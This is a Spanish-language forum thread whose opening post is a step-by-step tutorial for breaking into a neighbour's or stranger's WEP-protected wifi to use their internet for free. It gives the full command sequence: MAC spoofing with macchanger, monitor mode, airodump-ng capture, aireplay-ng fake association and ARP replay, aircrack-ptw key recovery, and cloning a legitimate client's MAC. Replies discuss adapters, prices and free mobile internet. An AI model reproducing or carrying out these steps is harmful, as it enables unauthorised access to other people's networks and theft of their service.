Anuncio H

Colapsar

Anuncio

Colapsar
No hay anuncio todavía.

Cómo obtener Internet Gratis!!

Colapsar
Este es un tema pegajoso.
X
X
 
  • Filtrar
  • Tiempo
  • Mostrar
Limpiar Todo
nuevos mensajes

  • Cómo obtener Internet Gratis!!

    VULNERABILIDAD DE LA SEGURIDAD WIFI



    Hola gente que tal a los tiempos que me conecto y sobre todo de tiempo que posteo algo recuerdan el post de las llamadas gratis a movistar y claro jajaja en fin. El tema de hoy es como conectarnos a la red un vecino o alguien extraño que nuestra laptop o pc la detecta con buena o poca señal (obviamente con clave) y posteriormente navegar por internet. La respuesta es con Wifiway y muchas herramientas los cuales nos van a permitir medir la seguridad de las redes wifi y ver la clave, sin mas preámbulo vallamos al grano.
    Antes de entrar al tema lean en internet todo lo referente a redes wifi, voy a asumir que ustedes ya tienen conocimientos básicos del mismo.

    Herramientas
    1.Bajar primeramente el Cd de wifiway 1 en internet lo encuentran.
    2.Adaptador RTL8187 1000mw + Antena de 5dbi , ustedes pueden probar con cualquier otro adaptador que soporte modo monitor, los atheros son buenos.
    3.Bajamos el programa MAC Address Changer
    4.Leer y comprenderlo, no voy a responder preguntas tontas.

    Estamos Listo!
    Voy a empesar asumiendo que ya tienen cargado wifiway en su pc y están en el escritorio. Perfecto!.


    Los drivers de inyección del chisept ya vienen cargados.
    Abrimos una consola y tecleamos:

    #iwconfig

    Y nos sale interface de nuestro adaptador en mi caso me sale que mi adaptador es “wlan0”
    Vamos a cambiarle la mac:

    #macchanger -m 00:01:02:03:04:05 wlan0

    El sistema responde:




    Ponemos la tarjeta en modo monitor:

    #airmon-ng start wlan0

    El sistema responde:




    Tenemos todo a punto, lanzamos el airodump para ver nuestro AP.
    Tecleamos:

    #airodump-ng wlan0

    Veremos una lista de los AP:



    Cuando veamos nuestro AP en la lista pulsamos Ctrl + c, se nos parará el airodump, nos fijaremos en el BSSID (MAC de nuestro AP), el canal y el ESSID (nombre de nuestro AP).

    Ahora volveremos a abrir el airodump con las opciones: -c (para filtrar por canal), la opción -b (filtrar por BSSID) y la opción -w para que nos cree un archivo donde se nos guardarán los ivs. El nombre del archivo puede ser cualquiera.

    #airodump-ng -w [nompre puede ser cualquirera] -c [channel] -w [iface]

    En nuestro caso:

    #airodump-ng -w captura -c 6 wlan0

    El sistema responde:




    Lo dejamos abierto, abrimos otra consola para asociarnos al AP, ataque 1 ó asociación falsa:

    #aireplay-ng -1 0 -e [bssid] –a [mac_targeta victima] –h [mac_nuestra targeta] [iface]

    Nuestro ejemplo:

    # aireplay-ng -1 0 -e NOMBRE_DE_LA_VICTIMA -a 00:1D:0F:XX:XX:XX -h 00:01:02:03:04:05 wlan0

    Si todo va bien, tenemos que ver esto:



    Una vez asociados, dejamos la consola abierta y abrimos otra donde lanzaremos el ataque para conseguir un paquete de datos WEP:

    #aireplay-ng -3 -b [mac_targeta victima] -h [mac_nuestra targeta] [iface]

    Sigamos con nuestro ejemplo:

    #aireplay-ng -3 -b 00:1D:0F:XX:XX:XX -h 00:01:02:03:04:05 wlan0

    Puede tardar más o menos pero nos tiene que salir algo así:






    Tomamos nota de la STATION de nuestro AP victima
    Apuntamos la MAC 00 1E 65 52 A3 D4
    Si no nos sale paciencia en algún momento alguien se conectara al AP víctima y saldrá atento por que aparece y desaparece repentinamente.
    Otro método es con el wiresharck por el momento no viene al caso.
    Estos apuntes que has realizado apúntalos en un papelito que luego lo usaremos.





    Ahora solos esperemos que capture 100 000 ARP o sino 50 000 #DATA como mínimo , en mi caso en 45 minutos de dejado prendido me había capturado más de 1 millón de data :D , Paciencia!
    Una vez capturado los paquetes necesarios le damos Ctrl+c a la captura para pararlo.
    En el root Miran el archivo captura más grande en mi caso fue el captura-01 en el suyo puede tal vez captura-02. En el mismo terminal digitamos.

    Sigamos con nuestro ejemplo:
    #aircrack-ptw captura-01.cap




    Donde dice key found with len 05: “09 19 68 XX XX” , esta es la clave! Si llegaste hasta aquí ya estás muy cerca para probar la clave.



    SIGUE............. POST SIGUIENTE!
    ................
    ..........
    ......
    ...
    ..
    .
    .
    .
    .
    .

  • #2
    .
    ..
    ...
    ......
    ........
    .............
    CONTINUA POST ! XD




    Cerramos todo y nos vamos a Windows

    Abrimos el programa MAC AddressChanger y ponemos la MAC que apuntamos en el paso anterior, es decir MAC 00 1E 65 52 A3 D4
    Luego clic en Change MAC ID aceptamos y luego cerramos el programa.
    En este paso lo que hemos hecho es cambiarle la MAC Nuestra y Clonar una MAC de un cliente de la red víctima, es decir para el AP somos alguien conocido y no extraño.





    Luego solo escaneamos la red y nos conectamos a la red de la victima poniendo la clave obtenida con el aircrack
    “09 19 68 XX XX” ojo que la clave está en Hexadecimal lo puedes convertir a ASSCI también si gustas de las 2 maneras es correcta




    Listo, si has llegado hasta acá ya te puedes dar un suspiro jajaja.. Ahora la prueba de fue abrir un explorador y probar si tenemos inter.




    :O cómo puedes ver la clave obtenida con aircrack es la correcta, la MAC que hemos clonado también es la correcta, por ende estamos conectados a la red que alguna vez no podíamos entrar.




    Comentario


    • #3
      dime si hay internet free para celulares antes tenia pero ahora ya no funca sabes algo y si es así postealo please .

      Comentario


      • #4
        Originalmente publicado por Mefistofenes
        dime si hay internet free para celulares antes tenia pero ahora ya no funca sabes algo y si es así postealo please
        Hay dos modos:
        1.-El más conocido : Wi-fi
        2.-Desde un Host te daban el permiso de clave de acceso al modem o router , tu desde tu celular te conectabas a la página del host (pagabas algo creo que era S./40-S./60 por año) , el individuo que te daba esto te daba un usuario y pass y tu solo logeabas , aunque para ser sincero no tiene sentido ; pero esos son los dos modos FREE.

        PD.- Por último creo que los celulares Unlocked , HTC por ejemplo navegan sin saldo pero deben ser libres de fábrica , no necesariamente por wifi , NO FUNCIONA CON 3G.

        Comentario


        • #5
          claro que hay para claro y movistar... pero este no es el tema!

          ademas para que quieres inter en tu cel , para que lo uses como modem en tu pc? este tipo de trucos su velocidad de descarga es de 24kbs, en otras palabras para msn y google! (z), este metedo que posteo es mucho mejor, ahora estoy conectado a un rauter de 4mb. si bien es cierto solo para los conocedores las claves con encriptacion WEP y WPA los pude decifrar aunq no eh podido con un WPA2.

          no hay ingenieros por aqui?

          Comentario


          • #6
            claro que sirve el Internet wap por ejemplo cuando no estas conectado en la pc.cuando estas en la universidad para buscar información .

            Comentario


            • #7
              Originalmente publicado por aioraxo
              ademas para que quieres inter en tu cel , para que lo uses como modem en tu pc? este tipo de trucos su velocidad de descarga es de 24kbs, en otras palabras para msn y google!
              Depende del equipo 24 kbs?? será Nokia 5200 xD! en mi n78 corria a 256kbs.

              Originalmente publicado por aioraxo
              claro que hay para claro y movistar... pero este no es el tema!
              Toda la razón. Renzo disculpa el spam :)

              Comentario


              • #8
                eso es cierto los equipos tienen banda 3G.5 es mejor mas rápido mas ganancia

                Comentario


                • #9
                  buena informacion.

                  Comentario


                  • #10
                    Estoy bien seguro que mas del 99% de lo que se encuentran inscritos en este foro paga internet!

                    Comentario


                    • #11
                      wow si tan solo hubiera leido esto cuando tenia la antena q detecta el wifi de mis vecinos
                      ahora le pago 50 soles a un vecino para tener inter Haga clic en la imagen para ver una versión más grande

Nombre:	tinysmile_fatgrin_t.png
Visitas:	1
Size:	1,3 KB
ID:	193239

                      Comentario


                      • #12
                        tienes suerte que a la fecha de hoy todavia hay redes wifi con este tipo de encriptacion (clave) vulnerables, depende de ti si quieres seguir pagando a tu vecino o no. me dare un tiempo para actualizar mis post. aunq con ese metodo aun funciona. son 5 metodos, el descrito en el post solo explica 1 metodo porciaso.

                        Comentario


                        • #13
                          pero, con que modem se hace eso?

                          Comentario


                          • #14
                            Trujillan0
                            pero, con que modem se hace eso?
                            tienes que tener una Tarjeta de Red Inalambrica con Chipset RTL 8187L de 100mw o 1000mw. en el mercado oscila entre los 100 y a 120 soles

                            Comentario

                            Anuncio V

                            Colapsar

                            Anuncio V

                            Colapsar
                            Trabajando...
                            X